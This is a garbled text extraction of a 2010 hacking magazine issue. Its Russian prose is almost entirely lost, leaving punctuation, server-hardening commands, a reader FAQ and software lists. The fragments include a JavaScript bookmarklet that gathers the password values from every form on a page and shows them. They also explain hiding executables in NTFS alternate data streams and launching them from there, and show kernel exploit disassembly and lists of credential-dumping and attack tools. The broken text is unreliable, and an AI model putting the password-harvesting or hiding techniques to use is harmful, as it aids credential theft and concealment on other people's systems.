Include modsecurity/base_rules/*.conf
#
Include modsecurity/optional_rules/*.conf
</IfModule>
modsecurity_crs_10_config.conf,
ModSecurity, ;
,
, .
.
:
$ sudo service apache2 start
.
MosSecurity , ,
.
Suhosin PHP
, PHP
-,
. , , ,

. ,
: suPHP, htscanner Suhosin. suPHP
(suphp.org) Apache (mod_suphp)
PHP, PHP-
. htscanner (pecl.php.net/package/htscanner)
,
htaccess. , , Suhosin (hardened-php.net/suhosin),
130
GreenSQL

,
, include (
realpath SQL
).
Feature List (hardened-php.net/
suhosin/a_feature_list.html).
Suhosin ,
.
PHP,
(Engine Protection).
Suhosin-, PHP.
PHP . Ubuntu
10.04:
$ sudo apt-get install php5-cli
$ php -v
PHP 5.3.2-1ubuntu4.5 with Suhosin-Patch (cli) (built:
Sep 17 2010 13:49:46)
, PHP Suhosin. ,
PHP suhosin.so, PHP.
,
. ,
/. Ubuntu
.
$ sudo apt-get install php5-suhosin

/etc/php5/conf.d/suhosin.ini. , ,
, . man-
Configuration (hardened-php.net/suhosin/configuration.
html).
-, , . ,
,
! z
X 12 /143/ 10
UNITS
Oriyana oriyana@xpsycho.ru, Andrushock andrushock@real.xakep.ru
PSYCHO:
M EGA FAQ M I N DF UC K

, , , , ][
, , , , ; .
, ,
, .
,
.
, 50
,
15-20 ,
, . . ,
, ,
; ,
! ,
. ,
,
, , .
.
Q:
?
:
.
,

, , ,
132

; ,
, , -

. , ,
,

,
(
),

. .
Q: ,
?
A: , , ,
, ,
.
,
, ,
.
: =
,
(
). , , ,

, .
, -
,
,
, . ,
: , ,
,
,
, . ?

( , , ,
, ,
),
; , ,
, .
,

.
, - (
),
- ,
,
.
Q:
?
A:
,
, ( ).
:
.
, , ,
- ,
X 12 /143/ 10
MegaFAQ mindFUCK: ,
. .
: ?.
,

, ,

.
;
.
, ,
- ;
, ,

/,
;

,
..;
.

.
?,
,
.
, ,
. ,
, :
, , . ,
,

.
. .
, ,
,
, , ,

;
X 12 /143/ 10
(

). e-mail,
,
,
, ,
. : 50%
,
;
,
,
5-10
.
Q: ,
?
A:
,

,
:

: , , , , ?

?
?
- ?
, ?
?
,
?
: , , ?
,
?

, ?
Q: .
?
A: ,
( ):
1. .

, .
,
. :
, .
, ,
. .
2. .

,
. ,
,
. , , ,

,
,
.
,
, .
Q: ? ?
133
UNITS
A: , :
1. .

, ,
,

, ,
- . ,
, ,
.
2. .
,

, .
,
,

: ?. ;

.
3. .
(, )
.
, ,
,
. ,

,
.

, ,
-
.
4. .
, ?
,
.
,
,
:
,
, ,

.
5. !
, ,
, ,
-
. , ?
, , .
-
134
-
, .
,
, ,
() .

. ,
,
,
:
,
,
,
, ?
,
.
6. .
- : , , ,
. ,
, , ,
,
, .
Q: ,
?
A: , -
, ,
. ,
, ,
.
.
1. :
, ;
;
;
, .
:

;

(
),
, ;
:
, . ,
?.
2. :
(, ,
);
X 12 /143/ 10
,
,
.
:
,
,
, ,
,
-
. ,

, ,
,
.
,
25- ,
- .
;
;
,
.
:
,
;
;
- ,
.
3. :
;

;
.
:
,
:
. , , .
4. :
;
, ;
-, , .
:
:
,
.

,
.
X 12 /143/ 10
5. :
()
, .
:
( :
.
,
);
( ,

);

. ,
()
? ,
,
,
.
:
, , ,
,
, ,
,
.
Q:
,
() ,
5.1
. ?
A: ?
-
. .
,
,

,
.
, (16-100 ) ( ,
,
..), ,
,
. ,

.
.
Hint: ,
,
.

(, Soundcare SuperSpike 1) (
Furutech G-314Ag).
Q: ,
, .
?
A: , .
Q: .
?
A: ! , :

, :
,
( ) (,
).
/ ,
135
UNITS
. ,
(
).
?
.

.
.
Q: ?
A:
, ,

, ,
,
, ,
. ,
, () .
,
.
,

Q: , ,

?
136
A: . . DJ
,
,
.

.
. 30 1938
.

,
,
.
,
,

.
,
(
).
Q: ,
,

. ?
A:
.
,
,
.
,
, ,
. , ,

. ,

;
.
X 12 /143/ 10
Q: -
.

?
A: , . ,
, ,
,

!, , ,
- . ,
,
, ,
, , ,
( ,
, ).
: , ,
, .
(. ,

PR-
X 12 /143/ 10
][ 4 2010 ), , , -
. ,
-- ,
. , , , PR, .
Q: , .
?
A: , , .
,
? ,
.
,
?
(
, ),
, 80%
.
, ? . . ,
:
, 100% .
. ,
,
,
, , ,
,
. ,
,
,
, .
, , ,

, ,
,
, . ,
(
, , )
,
. , , ! , ,
][
:).z
137
!
800 !
8.5
DVD
191
2200 .
23% ,
( )
(250 )
30 ,
31 ,
31 .

+ DVD
DVD
+ DVD
Total Football
+ DVD
DVDXpert
+ DVD
Smoke
PC : DEAD SPACE 2

10
: 250
#10(82) 2010
DEAD
SPACE 2
. 36
BIOSHOCK INFINITE

+ DVD
. 90
. 44
DRAGON AGE 2
, RPG
MAFIA 2
PC
+ 2 DVD
Mountain Bike
Digital Photo
+ DVD
+ DVD
T3
Onboard
Ski Pass
! !
. 50
.
: 210

11 (142) 2010
HTML5?
. 26
ZEUS
METERPRETER
CHAOS CONSTRUCTIONS 2010:

CISCO

TCL
. 64

+ + 2 DVD: 162
( 35% , )
+
12 3890 (24 )
6 2205 (12 )
,
.
,

, :
!
1. ,
,
http://shop.glc.ru.
2. .
3.
:
subscribe@glc.ru;
(495) 780-88-24;
119021, , . ,
. 11, . 44, , .

72 000 QIWI
() .
!
.
,
. , ,
.
, .
( )

. .
6 c 1260 ( ).
6
R-kiosk , . , .27-31 648 .
,
.
(495)780-88-29 ( ) 8-800-200-3-999 ( ,
, ). , /
INFO@GLC.RU WWW.GLC.RU .
UNITS

faq
united?

faq@real.xakep.ru
Q:
, . -
,
?
A: ,
. , ,

. , ,
hex- Hiew.
,
Hiew . , *,
Alt+F3 (CryBlk).
.
, Hiew ,
Crypt commands
.
<F7>,
.
,

.
<Alt+F3>, <F9>.
XOR
140
.

Hiew .
<F3>, <F8>
.
Q: :
Linux
. .
A:
. aufs2. - .
,
.
(aufs.sourceforge.net)
userspace- .
:
(/media/torrents)

(/media/new_storage). ,
,
:
# sudo mount -t aufs none /media/
storage -o br:/media/torrents=rw:/
media/new_storage=rw,create=mfs,sum

:
br: 1=rw: 2=rw:
, , , ;
create=mfs , ,
,
; sum ,
df pydf

.
/etc/fstab :
none /media/storage aufs br:/
media/torrents=rw:/media/new_
storage=rw,create=mfs,sum 0 0

,
mhddfs,
, fuse.

:
# sudo mhddfs /media/torrents,/
media/new_storage /media/storage
-o default_permissions,allow_other

.
X 12 /143/ 10
,
SSL
Adminer phpMyAdmin
bash# ./gotssl.py google.com 443

-{ GotSSL? v0.1 }-
Q: DirectX. ,
.

,
.
?
?
A: ,
. ,
.
. ,
WinDbg.
, WinDbg . , . .server tcp:port=1111
( ).
. ,
, WinDbg, File
Connect to Remote Session...,
Connection String tcp:server=Server
,port=Socket, Server
, Socket
( 1111). ,

.
Q: -
URL,
-.
A:

Soft Hyphen (SHY). ,
, . HTML4

,
-.
X 12 /143/ 10
.
. ,
.
URL-,
-. -
-
.
Q: phpMyAdmin.

MySQL ,
PHP-?
A: Adminer ( phpMinAdmin),
PHP
MySQL- .

PHP-,
. Adminer
,
phpMyAdmin. , ? :).
, www.adminer.org ,
PostgreSQL, SQLite, MS SQL Oracle.
Q: , - SSL?
A:
gotssl (mjc.me/?p=188).
,
socket. RFC
SSL Wireshark'
,
- SSL-.
,
SSLv2 Client Hello data
TLS- .
gotssl :
[*] Checking for SSL on google.

com:443
[!] Yes! google.com:443 does
GotSSL.
Q: (
). ?
A:
, .

JS-,
, *.
,
- . , , ,

:
javascript:(function(){var
s,F,j,f,i; s = ""; F = document.
forms; for(j=0; j<F.length; ++j) {
f = F[j]; for (i=0; i<f.length; ++i)
{ if (f[i].type.toLowerCase() ==
"password") s += f[i].value + "n";
} } if (s) alert("<span id="IL_AD7"
class="IL_AD">Passwords</span> in
forms on this page:nn" + s); else
alert("There are no passwords in
forms on this page.");})();

, .
Q:
.
:
(OpenID, Facebook, Twitter ..)
/
. ?
141
UNITS
MustHave
SSD-
A:
,

(dvd.xakep.ru). ,
.
:
IntenseDebate (www.intensedebate.com)
DISUS Comments (disqus.com).

WordPress' ( )
-,
:
;
(/ );
;

(OpenID, Twitter ..).
:
,

.
, .
.
MySQL-,
- .
Intense Debate .
Q:
SATA-
SSD. , ,
.

. SSD -.
A: . ,
,

. ,
.

SSD-. ,

,
Windows.
, -
142
SSD Tweak Utility (www.

techspot.com/guides/246-ssd-performancetweak-utility).

.
(Use Large
System Cache),
8.3,
/
,
.
Intel
SSD Toolbox (www.intel.com/go/ssdtoolbox),

(
Intel) ( SSD
).
Q: Python . py2exe
py2app ,
.
pyinstaller,

Python.
A: cx_Freeze
(cx-freeze.sourceforge.net).
( pyinstaller),

Windows,
Linux-.
Windows
CentOS -, . cx_Freeze,
Python.
Windows. ,

.
?
A:
ExpanDrive (www.expandrive.com),
SFTP Drive.
Dokan
SSHFS (www.dokan-dev.net).
AnyClient,
FTP/S, SFTP WebDAV/S.

PyTTY. ,
(www.damtp.cam.
ac.uk/user/jp107/xp-remote/ssh-map).
Q: exe-,

NTFS (ADS)?
A:
start
wmic processs call create,
,
NFS.
Q:
NTFS. :
. ,
doc-
txt- Word.
?
A: Windows 7
.

NTFS:
Q: LiveCD-,

C:\temp>echo tst > maindoc.txt
( , ,
C:\temp>echo ads > maindoc.txt:ads.
), txt
? -

c:\temp\maindoc.
.
txt:ads.txt Word... .
, :
, Linux
.
C:\temp>mklink txtfile c:\temp\
A:
maindoc.txt:ads.txt
CloudUSB (www.cloudusb.net). Ubuntu ,
EncFS,
AES BlowFish. - (, ,
), CloudUSB
(
) Dropbox.
,
.
Q: :
( SSH)
symbolic link created for txtfile

<<===>> c:\temp\maindoc.txt:ads.
txt

,
(c:\temp\txtfile), , Word
.
, ,

exe.
start. ,
, , Windows 7.z
X 12 /143/ 10
>Security
DigsbyPasswordDecryptor
ESF
Firesheep 0.1
InMemoryFuzzer
ISR-evilgrade 2.0.0
Metasploit 3.5 Pro
>Devel
Argtable 2.12
Ccache 3.1
Cdoc 0.9.7
DbVisualizer 7.1.3
Distcc 3.1
Doxygen 1.7.2
Eric 5.0.3
Firebird 2.5
Jam 2.5
Jansson 1.3
KDbg 2.2.2
KDevelop 4.1
Kodos 2.4.9
>>UNIX
>Desktop
CherryTree 0.15
ChmSee 1.2.0
Cinelerra 4.2
Desktop Designer
Doodle 0.7.0
EveryGUI 0.99b
Furius ISO Mount 0.11.3.0
Gnac 0.2.2
Google Earth 5.2
KoolDock 0.3
Launchy 2.5
Lotus Symphony 3
Nevernote 0.92.1
Strigi 0.6.4
Tesseract 3.00
X-Tile 1.8.2
XNeur + gXNeur 0.10.0
Xwrits 2.26
>Security
Arachni 0.2
BeEF 0.4.1-alpha
EDB Linux Debugger
0.9.16
hashkill 0.2.3
ISR-evilgrade 2.0.0
Metasploit 3.5 Pro
Ninja
pwntooth 0.2.3
REMO 0.2.0
Rozorback 0.1.2
RSYaba
Sguil 0.7.0
sqlsus 0.5rc1
USBsploit 0.4 BETA
wifite
Aidsql
CryptCat 1.2.1
Ctrace 0.9
Dorkmaster 0.1
Doscan 0.3.1
Firesheep 0.1
HexInject 1.1
Hyenae 0.35.2
Iexploder 1.7.2
Logkeys 0.1.1a
Mandos 1.2.3
Publimark 0.1.4
Social-Engineer Toolkit
Sydbox 0.7.1
Tariq
THC-Hydra 5.8
USBsploit 0.3b
Zed Attack Proxy 1.0.0
>Net
ClipGrab 3.0.7.2
Corkscrew 2.0
Dante 1.2.2
Facebook Notifier 0.3
Google Chrome 7.0.517.41
Histwi 0.6.7
Licq 1.5.0
Minitube 1.2
Mozilla Firefox 3.6.12
OpenVerse 0.8.7
Opera 10.63
PenguinTV 4.1
qutIM 0.2.0
Remuco 0.9.3.1
Smuxi 0.8
Steadyflow 0.1.5
TooBars 1.11
Transmission 2.10
>Games
0 A.D. Alpha 2
LLVM 2.8
Mono 2.8
Snaked 0.3
Vala 0.11.0
Valgrind 3.6.0
>>MAC'
SweetFM 2.0.1
Quick Learner 0.5
Wall4iphone 1.0
Flock 3.0
Shrinkr 1.0
Disk Drill 1.0.52
GoodSync 1.5.5
RetroX 1.2
MenuWeather 3.0.1
Greenfoot 2.0
Raw Photo Processor 4.1.8
Cyberduck 3.6.1
TrailRunner 3
Editra 0.5.86
Iceberg 1.2.9
>X-distr
Ubuntu 10.10
>System
ATI Catalyst 10.10
Avfs 0.9.9
Batmon 0.5
Blocksshd 1.3
Bontmia 0.14
Boxbackup 0.10
Cdf 0.2
Clean 3.4
Dolly 0.57
duff 0.4
Linux Kernel 2.6.36
Mesa 7.9
q4wine 0.120
Scrub 2.2
VirtualBox 3.2.10
Wine 1.3.6
>Server
Apache 2.2.17
Asterisk 1.8
BFilter 1.1.4
BIND 9.7.2-P2
CUPS 1.4.4
DHCP 4.1.1
Feng Office 1.7.2
Kamailio 3.1.0
MySQL 5.1.51
OpenLDAP 2.4.23
OpenSSH 5.6
OpenVPN 2.1.3
pgAdmin 1.12
Postfix 2.7
PostgreSQL 9.0.1
Samba 3.5.6
Squid 3.1.9
Wzdftpd 0.8.3
>Net
digsby
FluffyApp 0.8.6
Googsystray 1.2.4
mIRC v7.14
Multi Uni-Uploader 2.5
Opera 11 alpha
SmartSniff 1.72
streamwriter
>Multimedia
AeroWeather
EasyMon!
Evernote 4.0.1
Google SketchUp 8
Grooveshark v1.1.1
iTunes 10.0.1
Microsoft Expression Encoder 4
MP3 Skype Recorder v.1.9.0
RadioSure 2.1.969
Winamp 5.58
Yawcam 0.3.3
>Misc
7Conifier 0.4 R3 BETA
Anki 1.0.1
AppAdmin v1.1.0
CinemaDrape 1.2
DeskHedron 1.0
Desktop Tray Launcher 1.2
exf 1.0.1.6
Hot Corners 2.2.2.0
HotKeyMan 1.0.3
iQ-Notes 5.02
Lexiconer
Quick Cliq 1.0.3.8
RT Windows 7 Registry Tweaker v2.1
TimeFlow 0.04
UNetbootin
WinAudit Freeware v2.28.2
>Games
XMoto 0.5.3
>System
Action(s)
Aerofoil 1.5.1
CCleaner 3.0
DriveGleam
EasyBCD 2.0.2
ExactFile 1.0.0.15
Explorer++ 1.2
InjuredPixels 2.1
Intel Data Migration
Ketarin 1.5.0
MyDefragPowerGUI 1.0.2
P2 eXplorer
Rohos Mini Drive
SSD Tweaker 1.6.5
UsbDummyProtect 1.1
NirCmd v2.45
NSDECODER 1.0
OracleEnumerator v1.1.1
PaltalkPasswordDecryptor
PuzlBox
SDL Regex Fuzzer
setdllcharacteristics
TrillianPasswordDecryptor
Windows Credentials Editor 1.0
Windows Credentials Editor v1.0
(WCE)
0d
12(143) 2010
>>WINDOWS
>Development
cx_Freeze
DbVisualizer 7.1.3
Doxygen 1.7.2
Firebird 2.5.0
IronPython 2.6.2
IronRuby 1.1.1
kodos 2.4.9
PyCharm 1.0
Rad Software Regular Expression
Designer 1.4
Verych's Regular Expression Editor
x 12 (143) 2010
143
MAC OS X IPHONE
. 48
WINDOWS

: 2
10
.
. 96

OBJECTIVE-C
C. 62
,
?
HTML5
VIRTUALBOX TIPSNTRICKS
.NET
WIN32.WHISTLER

12 (143) 2010
DIGITAL FORENSIC: . 34
UNITS
HTTP://WWW2
How-to

HTML5

INSTRUCTABLES
www.Instructables.com
THE
HTML5 TEST
www.html5test.com
.
How-to. RFID-?
? ?

?
?
? , - ? How-to ,
Instructables. !

, HTML5.
-
-, canvas video, storage (
), .
, Firefox, Opera,
, . . -
-, ,
. 300 ,
. Google Chrome 217.

,
-,

,
donate
THECOMMENTOR
www.thecommentor.com
FLATTR
www.flattr.com
][
: , -
, .
:
, , .
. (JPG,
GIF, PNG, TIFF, PSD, BMP, PDF), ,
, ,
. , 15 ,
:).
Like Facebook,
, .

, .
: (
) .
Flattr . flattr
- , donate ,
.
. ,
. ,
- ,
.
144
X 12 /143/ 10
>> coding
3 -
QIWI ():
3 000 , 2 000
1 000 QIWI
QIWI Visa Virtual *.
* QIWI Visa Virtual

-,
Visa.
100
000 QIWI (), QIWI
www.qiwi.ru .
, ?
?
. -
.

Хакер 2010 12 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2010 12 PDF

Оригинальное название:

Загружено:

Авторское право:

Доступные форматы

x 12 (143) 2010

Kernel Pool Overflow

Windows Filtering Platform

/ .: (495) 935-7034, : (495) 780-8824

/ .: (495) 935-4034, : (495) 780-8824

$12000 Mozilla 12-

ENLARGE YOUR PENIS:

Samsung BX2240 LED

, , , Adobe Flash. HTML5, . , , Youtube Vimeo,

Chromium ( Google Chrome)

(Cross Domain Messaging);

Cross Domain Messaging

<input name="email" type="email"/>

RDP-. phpVirtualBox, , RDP Web Control . -

2. - PHP. , XAMP XAMPPLite (www.apachefriends.org).

VBoxManage convertfromraw ImageFile.dd OutputFile.vdi

Tavis Ormandy Google Security Team

Microsoft .NET Framework 1.1-4.0

DIR. rscL- , EAX

Shockwave Player 11.5.8.612

DIR. RIFF -. \x57\x46\x49\x52 XFIR .

Stuxnet :). ESET

var mem=new Array();

Internet Explorer 8 JS.

Pass The Hash Metasploit Framework

Arg3: 00000001, value 0 = read operation, 1 = write

Arg4: 00000000, (reserved)

Kernel Pool Overflow

lock xadd dword ptr

cmp qword ptr [r12+80h],r9

mov rax,qword ptr [NETIO!gWfpGlobal]

cmp ebx,dword ptr [rax+970h] ; max

add rbx,qword ptr [rax+978h]

// add callout base

cmp dword ptr [rbx],0

mov qword ptr [rsp+28h], rax

mov qword ptr [rsp+20h], r12

call qword ptr [rbx+8]

Windows 7, , ( -!). , WFP

.text:000000000001C680 ProcessCallout proc near

, XSS-, LFI- SQL-

: The spamer from

: Half-open limit fix

MBR Bochs Enhanced Debugger

GPODDER 2.5 UNIXOID

XARA EXTREME 0.7

TUCAN MANAGER 0.3.8

TORRENT SEARCH 0.8.1

XBMC MEDIA CENTER SVN32789

AppImage- Portable Linux Apps

, , Deb RPM. AppImage

XBMC MEDIA CENTER SVN32789

1988 Acorn Computers RISC OS 2.00,

: control.tar.gz, data.tar.gz debian-binary.

TORRENT SEARCH 0.8.1

Phoronix Test Suite GUI

Ubuntu 32 Recommended for most

John the Ripper 32- , 2%

PHPBench 64- Linux

Calculate Linux Desktop 10.9 beta ( )

mencoder, QGears2), - (encodeflac, phpbench). , , ,

QGears2 CLD 64- Linux Mint